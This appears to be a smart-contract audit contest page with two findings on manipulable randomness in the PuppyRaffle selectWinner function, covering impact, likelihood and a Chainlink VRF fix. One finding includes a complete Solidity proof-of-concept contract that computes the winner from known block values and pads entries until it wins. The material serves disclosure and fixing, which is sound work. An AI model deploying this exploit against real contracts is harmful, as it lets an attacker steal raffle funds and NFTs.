Winner selection and rarity use predictable/manipulable chain inputs:
The caller can vary msg.sender; block producers/builders can influence inclusion and timestamps within protocol limits, and have special visibility/control over block entropy. This can bias winner choice and, especially, puppy rarity.
Likelihood:
selectWinner is permissionless, so any account can supply the msg.sender value included in both randomness calculations.
A malicious caller can generate and fund many accounts offline, then select an account whose address produces a favorable winner index and/or rarity for the current block entropy.
Block producers can influence transaction inclusion and timestamp, and the block entropy (block.difficulty / prevrandao) is not a verifiable random source for a high-value raffle.
Impact:
An attacker can bias selection toward an attacker-controlled raffle entry, unfairly taking the 80% ETH prize and NFT.
An attacker can bias the NFT rarity toward legendary, reducing rarity scarcity and harming NFT holders.
This test searches attacker-controlled private keys until it finds one that:
Selects playerOne (the attacker-controlled raffle entry) as the winner.
Produces a legendary puppy rarity.
Use asynchronous verifiable randomness—not block.timestamp, block.difficulty, or msg.sender. The raffle must freeze entries and refunds while waiting for the random result, so the participant set cannot change between requesting and using randomness.
Below is an illustrative adapter pattern; in production, make randomnessProvider the official Chainlink VRF coordinator/consumer integration.
The key security properties are:
No user-controlled value contributes to the random output.
Only the trusted VRF coordinator can fulfill the pending request.
The participant set is immutable between the randomness request and winner selection.
The same VRF word, domain-separated with tokenId, supplies the rarity roll.
## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.
The contest is live. Earn rewards by submitting a finding.
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsThe contest is complete and the rewards are being distributed.